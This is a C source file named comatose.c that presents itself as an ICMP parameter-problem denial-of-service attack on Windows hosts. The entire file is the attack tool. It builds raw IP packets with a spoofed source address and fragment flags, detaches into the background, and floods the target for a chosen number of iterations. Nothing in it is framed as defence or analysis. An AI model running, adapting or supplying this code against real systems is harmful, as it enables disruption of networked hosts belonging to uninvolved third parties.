/*
 *  -> PRIVATE. DO NOT USE / DO NOT DISTRIBUTE. <-
 *
 *  Copyright (c) anathema <anathema@box.co.uk>. All rights reserved.
 *
 *  comatose.c
 *  ICMP_PARAMETERPROB based DoS attack (Windows hosts).
 */  

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <ctype.h>
#include <fcntl.h>
#include <string.h>
#include <signal.h>
#include <memory.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/time.h>
#include <netinet/in.h>
#define __FAVOR_BSD
#define __BSD_SOURCE
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <netdb.h>

#define IPHDRLEN		sizeof(struct ip)
#define ICMPHDRLEN		sizeof(struct icmp)

struct
packet
{
    struct ip ip_hdr;
    struct icmp icmp_hdr;
};

u_long
resolve_host(u_char *host_name)
{
    struct in_addr addr;
    struct hostent *host_ent;
    
    addr.s_addr = inet_addr(host_name);
    if (addr.s_addr == -1)
    {
	host_ent = gethostbyname(host_name);
	if (!host_ent) return(-1);
	memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);
    }
    
    return(addr.s_addr);
}

u_short 
in_cksum(u_short *addr, int len)
{
    u_short *w = addr, ans = 0;
    int nl = len, sum = 0;
    
    while (nl > 1)
    {
	sum += *w++;
	nl  -= 2;
    }
    
    if (nl == 1)
    {
	*(u_char *)(&ans) = *(u_char *)w;
	sum += ans;
    }
    
    sum  = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    ans  = ~sum;
    
    return(ans);
}

void
predator(u_long src_ip, u_long dst_ip)
{
    struct sockaddr_in sin;
    struct packet pkt;
    int sock;
    
    sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (sock == -1)
    {
	perror("socket allocation");
	exit(-1);
    }
    
    memset(&sin, 0, sizeof(struct sockaddr_in));
    memset(&pkt, 0, sizeof(struct packet));
    
    pkt.ip_hdr.ip_v     = 4;
    pkt.ip_hdr.ip_hl    = 5;
    pkt.ip_hdr.ip_len   = htons(IPHDRLEN + ICMPHDRLEN);
    pkt.ip_hdr.ip_id    = htons(rand() % 65535);
    pkt.ip_hdr.ip_off   = htons(IP_MF);
    pkt.ip_hdr.ip_ttl   = 64;
    pkt.ip_hdr.ip_p     = IPPROTO_ICMP;
    pkt.ip_hdr.ip_src.s_addr = src_ip;
    pkt.ip_hdr.ip_dst.s_addr = dst_ip;
  
    pkt.icmp_hdr.icmp_type   = ICMP_PARAMETERPROB;
    pkt.icmp_hdr.icmp_code   = 0;
    pkt.icmp_hdr.icmp_cksum  = in_cksum((u_short *)&pkt.icmp_hdr, ICMPHDRLEN);
    
    if (sendto(sock, &pkt, IPHDRLEN + ICMPHDRLEN, 0, (struct sockaddr *)&sin,
		sizeof(struct sockaddr)) == -1)
    {
	perror("sendto");
	close(sock);
	exit(-1);
    }
    usleep(250);
    
    pkt.ip_hdr.ip_off   = 0;
    if (sendto(sock, &pkt, IPHDRLEN + ICMPHDRLEN, 0, (struct sockaddr *)&sin,
		sizeof(struct sockaddr)) == -1)
    {
	perror("sendto");
	close(sock);
	exit(-1);
    }
    usleep(250);
    
    close(sock);
}

int
daemonize(void)
{
    int fd;
    
    signal(SIGTTOU, SIG_IGN);
    signal(SIGTSTP, SIG_IGN);
    signal(SIGTTIN, SIG_IGN);
    
    switch(fork())
    {
	case -1:
	    perror("daemonize(): fork()");
	    exit(-1);
	    /* NOTREACHED */
	case 0:
	    break;
	    /* NOTREACHED */
	default:
	    exit(0);
	    /* NOTREACHED */
    }
    
    if (setpgrp() == -1)
    {
	perror("setpgrp");
	exit(-1);
    }
    
    fd  = open("/dev/tty", O_RDWR);
    if (fd >= 0)
    {
	if (ioctl(fd, TIOCNOTTY, (char *)NULL) == -1)
	{
	    perror("ioctl");
	    close(fd);
	    exit(-1);
	}
	close(fd);
    }
    
    chdir("/");
    umask(0);
}

void
usage(u_char *namez)
{
    fprintf(stderr, "Invalid usage.\n"
	    "usage:\t%s src_host|ip dst_host|ip iterations\n", namez);
    exit(-1);
}

int
main(int argc, char **argv)
{
    struct in_addr inaddr;
    u_long src_ip, dst_ip;
    u_int iterations, i = 0;
    
    if (getuid() && geteuid())
    {
	fprintf(stderr, "Insufficient privileges (uid|euid == 0)\n");
	exit(-1);
    }
    
    if (argc != 4)
    {
	usage(argv[0]);
	/* NOTREACHED */
    }
    
    src_ip  = resolve_host(argv[1]);
    dst_ip  = resolve_host(argv[2]);
    
    if (src_ip == -1 || dst_ip == -1)
    {
	fprintf(stderr, "Invalid host|ip: `%s`.\n",
		(src_ip == -1 ? argv[1] : argv[2]));
	exit(-1);
    }
    
    iterations  = (u_int)atoi(argv[3]);
    
    inaddr.s_addr = src_ip;
    fprintf(stderr, "DoS: (%s) -> ", inet_ntoa(inaddr));
    inaddr.s_addr = dst_ip;
    fprintf(stderr, "(%s) [%d]\n", inet_ntoa(inaddr), iterations);
    
    if (daemonize() == -1)
    {
	fprintf(stderr, "Cannot become daemon.\n");
	exit(-1);
    }
    
    fprintf(stderr, "Successfully daemonized, launching attack.\n");
    for (; i < iterations; i++)
    {
	predator(src_ip, dst_ip);
    }
    
    fprintf(stderr, "\nCompleted `%d` iterations.\n", iterations);
    exit(0);
}

/* EOF */
